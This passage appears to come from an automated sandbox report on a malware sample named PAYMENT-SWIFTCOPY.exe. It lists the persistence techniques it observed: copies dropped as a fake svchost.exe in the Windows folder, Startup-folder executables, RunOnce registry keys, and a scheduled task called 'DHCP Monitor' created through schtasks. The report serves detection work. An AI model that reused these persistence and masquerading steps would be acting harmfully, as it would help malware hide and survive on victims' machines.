              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb$ source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393531655.0000000005CF0000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393531655.0000000005CF0000.00000004.00000001.sdmp
              Source: Binary string: .pdb-x source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.PDB source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: PAYMENT-SWIFTCOPY.PDB? source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_0040B550 push eax; ret 3_2_0040B564
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_0040B550 push eax; ret 3_2_0040B58C
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_0040B50D push ecx; ret 3_2_0040B51D
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret 4_2_0040B564
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret 4_2_0040B58C
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 4_2_0040B50D push ecx; ret 4_2_0040B51D
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040289F
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: real checksum: 0x38e42 should be: 0x70156
              Source: svchost.exe.0.drStatic PE information: real checksum: 0x38e42 should be: 0x70156
              Source: ???????????????.exe.0.drStatic PE information: real checksum: 0x38e42 should be: 0x70156

              Persistence and Installation Behavior:

              barindex
              Drops executables to the windows directory (C:\Windows) and starts themShow sources
              Source: unknownExecutable created and started: C:\Windows\Cursors\???????????????\svchost.exe
              Drops PE files with benign system namesShow sources
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Windows\Cursors\???????????????\svchost.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeFile created: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exeJump to dropped file
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeJump to dropped file
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeJump to dropped file
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Windows\Cursors\???????????????\svchost.exeJump to dropped file
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Windows\Cursors\???????????????\svchost.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the startup folderShow sources
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeJump to dropped file
              Creates autostart registry keys with suspicious namesShow sources
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAEFD.tmp'
              Creates an autostart registry key pointing to binary in C:\WindowsShow sources
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe\:Zone.Identifier:$DATAJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00401306
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00408E31
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
